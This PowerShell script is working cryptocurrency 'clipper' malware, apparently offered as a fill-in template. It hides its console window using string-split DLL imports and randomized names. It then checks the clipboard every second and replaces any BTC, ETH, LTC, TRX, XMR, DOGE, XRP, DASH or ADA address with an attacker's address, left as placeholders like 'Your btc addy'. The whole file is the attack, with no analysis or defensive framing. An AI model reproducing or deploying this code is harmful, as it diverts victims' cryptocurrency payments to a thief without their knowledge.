Add-Type -Name 'X7Y8Z9' -Namespace 'Q1W2E3' -MemberDefinition '
[DllImport("K" + "ernel32.dll")]
public static extern IntPtr GetConsoleWindow();
[DllImport("u" + "ser32.dll")]
public static extern bool ShowWindow(IntPtr hWnd, int nCmdShow);
public static void Conceal()
{
    IntPtr hWnd = GetConsoleWindow();
    if(hWnd != IntPtr.Zero)
    {
        ShowWindow(hWnd, 0);
    }
}
'

[Q1W2E3.X7Y8Z9]::Conceal()

$P4A5S6 = @{
    "K9J8" = "Your" + " btc addy"
    "M2N3" = "Your" + " eth addy"
    "H7G6" = "Your" + " ltc addy"
    "R8T9" = "Your" + " trx addy"
    "F4D5" = "Your" + " xmr addy"
    "L1K2" = "Your" + " doge addy"
    "Q3W4" = "Your" + " xrp addy"
    "Z5X6" = "Your" + " dash addy"
    "C8V9" = "Your" + " ada addy"
}

while ($true) {
    $V2B3N4 = Get-Clipboard
    if ($V2B3N4 -match ('^' + '(bc1|[13])[a-zA-HJ-NP-Z0-9]{25,39}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["K9J8"])
    }
    elseif ($V2B3N4 -match ('^0x' + '[a-fA-F0-9]{40}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["M2N3"])
    }
    elseif ($V2B3N4 -match ('^[LM3]' + '[a-km-zA-HJ-NP-Z1-9]{25,34}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["H7G6"])
    }
    elseif ($V2B3N4 -match ('^T' + '[a-zA-HJ-NP-Z0-9]{33}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["R8T9"])
    }
    elseif ($V2B3N4 -match ('^4' + '[0-9AB][1-9A-HJ-NP-Za-km-z]{93}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["F4D5"])
    }
    elseif ($V2B3N4 -match ('^D{1}' + '[5-9A-HJ-NP-U]{1}[1-9A-HJ-NP-Za-km-z]{32}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["L1K2"])
    }
    elseif ($V2B3N4 -match ('^r' + '[0-9a-zA-Z]{24,34}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["Q3W4"])
    }
    elseif ($V2B3N4 -match ('^X' + '[1-9A-HJ-NP-Za-km-z]{33}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["Z5X6"])
    }
    elseif ($V2B3N4 -match ('^D' + '[A-NP-Za-km-z1-9]{35,}$')) {
        [System.Windows.Forms.Clipboard]::SetText($P4A5S6["C8V9"])
    }
    Start-Sleep -Seconds 1
}
